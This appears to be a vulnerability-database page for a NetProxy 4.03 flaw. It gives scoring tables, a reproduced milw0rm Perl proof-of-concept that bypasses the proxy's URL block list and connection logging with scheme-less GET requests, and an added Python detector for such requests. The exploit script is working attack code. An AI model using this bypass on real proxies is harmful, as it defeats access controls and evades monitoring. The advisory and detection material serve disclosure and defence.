CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
The connection log file implementation in Grok Developments NetProxy 4.03 does not record requests that omit http:// in a URL, which might allow remote attackers to conduct unauthorized activities and avoid detection.
CVE Information
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
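| Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17) |
|---|---|---|---|---|---|
| 2022-02-06 | – | – | 1.21% | – | – |
| 2022-03-27 | – | – | 1.21% | – | – |
| 2022-04-03 | – | – | 1.21% | – | – |
| 2022-05-08 | – | – | 1.21% | – | – |
| 2022-08-28 | – | – | 1.21% | – | – |
| 2023-02-26 | – | – | 1.21% | – | – |
| 2023-03-12 | – | – | – | 1.15% | – |
| 2023-08-06 | – | – | – | 1.29% | – |
| 2023-09-17 | – | – | – | 1.34% | – |
| 2023-10-22 | – | – | – | 1.43% | – |
| 2023-12-03 | – | – | – | 1.44% | – |
| 2024-01-07 | – | – | – | 1.57% | – |
| 2024-02-11 | – | – | – | 1.57% | – |
| 2024-06-02 | – | – | – | 1.57% | – |
| 2024-08-25 | – | – | – | 1.57% | – |
| 2024-12-22 | – | – | – | 1.57% | – |
| 2025-01-19 | – | – | – | 1.57% | – |
| 2025-03-18 | – | – | – | – | 3.5% |
| 2025-03-30 | – | – | – | – | 3.5% |
| 2025-04-06 | – | – | – | – | 3.5% |
| 2025-04-06 | – | – | – | – | 3.5% |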
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile therefore lets you compare the EPSS score of one CVE with that of other CVEs.
#!/usr/bin/perl
###########################################################################
#
# Application:
#
# NetProxy 4.03
# http://www.grok.co.uk/netproxy/index.html
#
# Description:
#
# NetProxy includes a powerful web cache to boost
# performance and reduce online costs. There is
# also an application-level firewall to protect your
# network from unwanted access, full access logging
# to allow you to track Internet usage, and
# password-protected access to various Internet resources.
#
# Vulnerability:
#
# Sending a specially crafted request to the proxy server
# allows users to view restricted Web content and bypass
# the logging feature.
#
# Exploit:
#
# Assume that access to http://www.milw0rm.com has been blocked.
# The standard query string sent to NetProxy looks like:
#
# GET http://www.milw0rm.com HTTP/1.0
#
# NetProxy recognizes that this is a blocked URL and subsequently
# blocks the request. However, sending a request without 'http://'
# in the URL allows access to the blocked URL (note that the port
# must be manually specified as well):
#
# GET www.milw0rm.com:80 HTTP/1.0
#
# In addition, requests made in this manner are not logged to
# NetProxy's connection log file.
#
# Work-Around/Fix:
#
# Since the application automatically prepends the 'http://' string
# to every URL specified in the block list, this technique should work
# for all restricted Web sites, and ensures that there is no easy fix
# for this security hole. POC code follows.
#
# Credit:
#
# Exploit discovered and coded by Craig Heffner
# http://www.craigheffner.com
# heffnercj [at] gmail.com
###########################################################################
use IO::Socket;
#Define the NetProxy server and port
$proxy_ip = "127.0.0.1";
$proxy_port = "8080";
#Set the site, port and page to request
$site = "www.milw0rm.com";
$port = "80";
$page = "index.html";
#Define FF and IE user agent strings
$ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
#Create connection to NetProxy
my $sock = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $proxy_ip,
    PeerPort => $proxy_port,
);
die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n" unless $sock;
#Format the request
$request = "GET $site:$port/$page HTTP/1.0\r\n";
$request .= "User-Agent: $ms_ff\r\n";
$request .= "\r\n";
#Send the request
print $sock $request;
#Read the reply
while(<$sock>){
    $reply .= $_;
}
close($sock);
#Separate NetProxy header from HTML (split once, on the blank line that ends the header)
($header,$html) = split(/\r\n\r\n/, $reply, 2);
print $html;
exit;
# milw0rm.com [2007-02-27]
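
A detection-side view of the flaw described in the advisory above, as an added example that is not part of the original advisory or of NetProxy: it classifies the request-target of HTTP request lines captured in front of a proxy, flags non-CONNECT requests whose target carries no scheme, and matches the block list on the extracted host rather than on a string with 'http://' prepended. The function names, the block list and the sample request lines are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed block list for illustration: hosts that proxy policy denies.
BLOCKED_HOSTS = {"blocked.example"}

def classify_target(method, target):
    """Name the request-target form (terms from RFC 7230 section 5.3)."""
    if target == "*":
        return "asterisk"
    if target.startswith("/"):
        return "origin"
    if "://" in target:
        return "absolute"
    # host:port without a scheme is only valid for CONNECT (authority-form).
    return "authority" if method.upper() == "CONNECT" else "schemeless"

def canonical_host(target):
    """Lowercased host of the target, whether or not a scheme is present."""
    if "://" not in target:
        target = "//" + target  # lets urlsplit treat host:port as the netloc
    return (urlsplit(target).hostname or "").lower()

def review(request_line):
    """Return (form, host, blocked) for one HTTP request line."""
    parts = request_line.split()
    if len(parts) != 3:
        return ("malformed", "", False)
    method, target, _version = parts
    form = classify_target(method, target)
    host = "" if form in ("origin", "asterisk") else canonical_host(target)
    return (form, host, host in BLOCKED_HOSTS)

def findings(lines):
    """Request lines worth alerting on: scheme-less target or blocked host."""
    hits = []
    for line in lines:
        form, _host, blocked = review(line)
        if form == "schemeless" or blocked:
            hits.append(line)
    return hits

# Constructed sample request lines, as captured on the wire.
SAMPLE = [
    "GET http://blocked.example/index.html HTTP/1.0",
    "GET blocked.example:80/index.html HTTP/1.0",
    "GET http://allowed.example/ HTTP/1.0",
    "CONNECT allowed.example:443 HTTP/1.1",
]

if __name__ == "__main__":
    for line in findings(SAMPLE):
        print(review(line), line)
```

Because the advisory states that such requests never reach NetProxy's connection log, the input has to come from an independent vantage point such as a packet capture or an upstream firewall log.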